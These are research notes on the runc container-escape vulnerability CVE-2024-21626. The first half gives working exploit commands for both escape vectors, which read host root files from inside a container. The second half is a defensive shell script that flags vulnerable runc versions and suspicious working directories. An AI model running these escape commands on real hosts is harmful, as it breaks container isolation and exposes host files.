Docker Escape Vulnerability CVE-2024-21626
Research link: https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd
According to the article, it can be exploited in 2 ways:
1) Set the working directory of the container to /proc/self/fd/<fd> when running it, where <fd> is the file descriptor that runc leaves open on /sys/fs/cgroup in the host filesystem (usually 7 or 8). The process then starts with its cwd on the host, so relative paths such as ../../../../../../ walk up to the host root.
2) Create a symlink inside the container pointing to /proc/self/fd/<fd> (same <fd> as above, usually 7 or 8). When a user later executes a command inside the container via docker exec or kubectl exec with the working directory set to that symlink, the new process gets a cwd on the host filesystem, and an attacker inside the container can reach the host filesystem through /proc/<pid>/cwd, where <pid> is the PID of the process created by the docker exec or kubectl exec command.
Commands:
1) Exploit via Setting Working Directory to /proc/self/fd/<fd>
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
cat ../../../../../../root/root/.txt

2) Docker Exec
Containerised root shell:> ln -sf /proc/self/fd/7/ /foo
Containerised root shell:> ln -sf /proc/self/fd/8/ /bar
Attacker shell:> docker exec -it -w /bar cve-2024-21626 sleep 120
Containerised root shell:> ls -f /proc
Containerised root shell:> cat /proc/NUM/cmdline
Containerised root shell:> ls -la /proc/NUM/cwd/../../../../root/
Here NUM is the PID of the sleep process started by docker exec (confirm it with the cmdline check); the sleep only keeps that process alive long enough to read through its cwd. Which of /foo or /bar works depends on which descriptor number the leaked /sys/fs/cgroup fd gets on that host.

Detection:
According to the article:
The exploits have the following characteristics:
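As an added example that is not part of this page or of the nitroc.org article: a small POSIX shell script with two offline checks a defender can run against the vectors above. runc_vulnerable gates on the runc release (1.1.12 is the release that fixed CVE-2024-21626); flag_workdirs scans "name workdir" lines, as produced by docker inspect --format '{{.Name}} {{.Config.WorkingDir}}', for the /proc/self/fd/<fd> or /proc/<pid>/fd/<fd> working directory used by the first vector. The function names and the SAMPLE_INSPECT lines are constructed for this example. The docker exec vector does not show up in the container config, so this script does not cover it; that one has to be spotted from the host by looking at where /proc/<pid>/cwd of container processes resolves.

```shell
#!/bin/sh
# Added example (not code from nitroc.org or from this page):
# offline checks for the CVE-2024-21626 working-directory escape.
#   runc_vulnerable VERSION  exit 0 if VERSION is older than 1.1.12 (the fix)
#   suspicious_workdir PATH  exit 0 if PATH has the /proc/.../fd/<n> shape
#   flag_workdirs            print "name workdir" lines that hit that shape

# Version gate. Accepts "1.1.11", "v1.1.11" or "1.1.11-rc1"; the "v" prefix
# and any pre-release suffix are ignored. Live input:
#   runc --version | awk 'NR==1 {print $3}'
runc_vulnerable() {
    v="${1#v}"
    v="${v%%-*}"
    old_ifs="$IFS"; IFS=.; set -- $v; IFS="$old_ifs"
    major="${1:-0}"; minor="${2:-0}"; patch="${3:-0}"
    if [ "$major" -lt 1 ]; then return 0; fi
    if [ "$major" -gt 1 ]; then return 1; fi
    if [ "$minor" -lt 1 ]; then return 0; fi
    if [ "$minor" -gt 1 ]; then return 1; fi
    if [ "$patch" -lt 12 ]; then return 0; fi
    return 1
}

# The first vector needs WorkingDir to name a leaked descriptor directly.
# A symlink to such a path (second vector) is not caught by a string check.
suspicious_workdir() {
    case "$1" in
        /proc/self/fd/*|/proc/[0-9]*/fd/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Reads "name workdir" lines on stdin and prints the ones that look like the
# exploit. Live input:
#   docker ps -q | xargs docker inspect --format '{{.Name}} {{.Config.WorkingDir}}'
flag_workdirs() {
    while IFS=' ' read -r name wd; do
        [ -n "$wd" ] || continue
        if suspicious_workdir "$wd"; then
            printf '%s %s\n' "$name" "$wd"
        fi
    done
}

# Constructed sample of docker inspect output (names carry the leading "/").
SAMPLE_INSPECT='/web /usr/share/nginx/html
/cve-2024-21626 /proc/self/fd/8
/db /var/lib/postgresql
/build /proc/1/fd/7'

# Demo run on the constructed sample.
printf '%s\n' "$SAMPLE_INSPECT" | flag_workdirs
for ver in 1.1.11 1.1.12; do
    if runc_vulnerable "$ver"; then
        echo "runc $ver: vulnerable, upgrade"
    else
        echo "runc $ver: fixed"
    fi
done
```

On a host with docker installed, pipe the live docker inspect output into flag_workdirs instead of the sample; a hit is not proof of exploitation (an image could legitimately set a WorkingDir under /proc only by accident), but it is exactly the configuration the first vector needs, so it is worth an immediate look at the runc version and at who created the container.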